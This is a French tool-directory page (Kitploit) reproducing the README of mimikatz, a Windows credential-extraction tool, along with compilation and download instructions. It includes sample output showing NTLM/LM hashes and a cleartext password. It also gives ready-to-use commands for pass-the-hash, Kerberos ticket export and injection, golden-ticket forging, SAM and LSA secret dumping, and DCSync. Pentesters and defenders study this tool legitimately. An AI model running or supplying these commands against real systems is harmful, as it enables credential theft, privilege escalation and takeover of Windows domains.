Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mimikatz — Outil pour extraire les informations d'identification Windows (mots de passe, hachages, tickets Kerberos) de la mémoire et effectuer des attaques pass-the-hash, pass-the-ticket et golden ticket. | Kitploit
Outils/GitHubGitHub/parrotsec/mimikatz
Escalade de PrivilègesCriminalistique MémoireAttaques de Mots de PasseExploitationMouvement LatéralTests d'IntrusionAuthentificationRed Teaming
GitHubparrotsec/mimikatz

mimikatz

Outil pour extraire les informations d'identification Windows (mots de passe, hachages, tickets Kerberos) de la mémoire et effectuer des attaques pass-the-hash, pass-the-ticket et golden ticket.

Voir le dépôt
2.6k3564il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

mimikatz

mimikatz est un outil que j'ai créé pour apprendre le C et faire quelques expériences avec la sécurité de Windows.

Il est désormais bien connu pour extraire des mots de passe en clair, des hashes, des codes PIN et des tickets Kerberos de la mémoire. mimikatz peut également effectuer du pass-the-hash, du pass-the-ticket ou construire des Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Mais ce n'est pas tout ! Crypto, Terminal Server, Events, ... beaucoup d'informations dans le GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki ou sur http://blog.gentilkiwi.com (en français, oui).

Si vous ne voulez pas le compiler, des binaires sont disponibles sur https://github.com/gentilkiwi/mimikatz/releases

Utilisation rapide

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilation

mimikatz se présente sous la forme d'une solution Visual Studio et d'un pilote WinDDK (optionnel pour les opérations principales), les prérequis sont donc :

  • pour mimikatz et mimilib : Visual Studio 2010, 2012 ou 2013 pour Desktop (2013 Express pour Desktop est gratuit et prend en charge x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • pour le mimikatz driver, mimilove (et la plateforme ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz utilise SVN pour le contrôle de source, mais est maintenant disponible avec GIT aussi ! Vous pouvez utiliser n'importe quel outil pour synchroniser, même le GIT intégré dans Visual Studio 2013 =)

Synchroniser !

  • L'URL GIT est : https://github.com/gentilkiwi/mimikatz.git
  • L'URL SVN est : https://github.com/gentilkiwi/mimikatz/trunk
  • Le fichier ZIP est : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Générer la solution

  • Après avoir ouvert la solution, Build / Build Solution (vous pouvez changer l'architecture)
  • mimikatz est maintenant compilé et prêt à être utilisé ! (Win32 / x64, voire ARM64 si vous avez de la chance)
    • vous pouvez obtenir l'erreur MSB3073 concernant _build_.cmd et mimidrv, c'est parce que le pilote ne peut pas être compilé sans Windows Driver Kit 7.1 (WinDDK), mais mimikatz et mimilib sont OK.

ddk2003

Avec cette plateforme MSBuild optionnelle, vous pouvez utiliser les outils de compilation WinDDK et le runtime msvcrt par défaut (binaires plus petits, sans dépendances)

Pour cette plateforme optionnelle, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 et Visual Studio 2010 sont obligatoires, même si vous prévoyez d'utiliser Visual Studio 2012 ou 2013 ensuite.

Suivez les instructions :

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence

Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz a besoin de café pour être développé :

  • PayPal: https://www.paypal.me/delpy/

Auteur

  • Benjamin DELPY gentilkiwi, vous pouvez me contacter sur Twitter ( @gentilkiwi ) ou par e-mail ( benjamin [at] gentilkiwi.com )
  • Les fonctions DCSync et DCShadow du module lsadump ont été co-écrites avec Vincent LE TOUX, vous pouvez le contacter par e-mail ( vincent.letoux [at] gmail.com ) ou visiter son site web ( http://www.mysmartlogon.com )

Ceci est un développement personnel, veuillez respecter sa philosophie et ne l'utilisez pas pour de mauvaises choses !

Télécharger l’outil